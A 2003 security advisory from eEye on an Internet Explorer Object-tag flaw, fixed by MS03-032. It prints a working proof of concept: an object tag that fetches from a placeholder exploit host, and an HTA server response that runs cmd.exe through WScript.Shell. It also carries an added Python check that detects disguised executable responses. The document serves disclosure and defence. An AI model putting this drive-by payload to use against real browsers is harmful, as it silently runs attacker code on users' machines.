eEye Digital Security has discovered a security vulnerability in Microsoft's Internet Explorer that would allow executable code to run automatically upon rendering malicious HTML.
This is a flaw in Microsoft's primary contribution to HTML, the Object tag, which is used to embed all ActiveX into HTML pages. The parameter that specifies the remote location of data for objects is not checked to validate the nature of the file being loaded, and therefore Trojan executables may be run from within a webpage as silently and as easily as Internet Explorer parses image files or any other "safe" HTML content.
This attack may be utilized wherever IE parses HTML, including web sites, e-mail, newsgroups, and applications that embed web-browsing functionality.
Credit:
The information has been provided by Drew Copley of eEye.
Vulnerable systems:
* Microsoft Internet Explorer 5.01
* Microsoft Internet Explorer 5.5
* Microsoft Internet Explorer 6.0
* Microsoft Internet Explorer 6.0 for Windows Server 2003
Technical Description:
--------------Client HTTP request---------------------------
<html>
...
<object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
</object>
</html>
------------------------------------------------------------
-------------Server HTTP Response---------------------------
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191

<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
</script>
</html>
------------------------------------------------------------
This example is in the more traditional vein. In house, we set up a demonstration system that silently loaded "bo2k" and "subseven" Trojans from within a single webpage.
The above example shows an entirely legitimate session. The only trick is that the "data" URL must not end in an unsafe extension (e.g., ".exe", ".bat", etc.). The "Content-Type" header returned by the server is treated by Internet Explorer as authoritative.
In other words, the client asks for a safe file, the server returns an unsafe file, and Internet Explorer does not know what hit it.
What Internet Explorer should do in this case is either not load the unsafe document at all, or prompt the user with a severe warning about the file, with the default option being to save it to disk rather than run it.
We can generally guess what is going on here. Because .hta or "HTML Application" files are not binary and mechanically resemble HTML files, IE's check of the content cannot classify the file as anything but safe. The second check, of the MIME type implied by the request, sees that a safe file type is being requested, and the third check, of the MIME type returned by the server, says that this is an HTML Application. For whatever reason, IE ignores the returned MIME type in the security context but honours it in the execution context.
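The mismatch the advisory describes, a URL that looks like inert content answered with an executable Content-Type, is something a filtering proxy can flag before the response reaches the browser. The following check is an added illustration, not code from eEye's advisory; the executable MIME list (beyond application/hta) and the "safe" extension list are assumptions chosen for the example, and the sample response below is constructed to mirror the headers shown above.

```python
import posixpath
from urllib.parse import urlparse

# MIME types that Internet Explorer hands to a script host or the shell instead of
# rendering as inert content. application/hta is the one the advisory describes;
# the remaining entries are assumptions added for illustration.
EXECUTABLE_MIME_TYPES = {
    "application/hta",
    "application/x-msdownload",
    "application/x-msdos-program",
}

# Extensions a browser treats as "safe" when it decides to fetch <object data=...>
# without a prompt. Assumed list; "" covers extension-less paths such as "/".
SAFE_EXTENSIONS = {"", ".html", ".htm", ".txt", ".gif", ".jpg", ".jpeg", ".png", ".cgi"}

# Constructed response header block mirroring the advisory's server reply
# (body omitted on purpose; only the headers matter for this check).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 13 May 2003 18:06:43 GMT\r\n"
    "Server: Apache\r\n"
    "Content-Type: application/hta\r\n"
    "Content-Length: 191\r\n"
    "\r\n"
)


def parse_response_headers(raw: str) -> dict:
    """Parse an HTTP response header block into a dict with lower-cased names."""
    headers = {}
    for line in raw.split("\n")[1:]:        # skip the status line
        line = line.rstrip("\r")
        if not line:                          # blank line ends the header block
            break
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def disguised_executable(request_url: str, raw_response: str) -> bool:
    """True when a 'safe'-looking URL is answered with an executable MIME type."""
    headers = parse_response_headers(raw_response)
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    url = request_url if "://" in request_url else "http://" + request_url
    ext = posixpath.splitext(urlparse(url).path)[1].lower()
    return media_type in EXECUTABLE_MIME_TYPES and ext in SAFE_EXTENSIONS
```

A proxy applying this check would block or rewrite the response to a download prompt; an honest request for a .hta URL is deliberately not flagged, since there the extension and MIME type agree.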
This attack was discovered through manual testing techniques. The hypothesis was: "Internet Explorer has many avenues where it might be presented with executable content. One of these avenues must be broken so that executable content might be automatically run."
Vendor Status:
Microsoft was notified and has released a patch for this vulnerability. The patch is available at: http://www.microsoft.com/technet/security/bulletin/MS03-032.asp.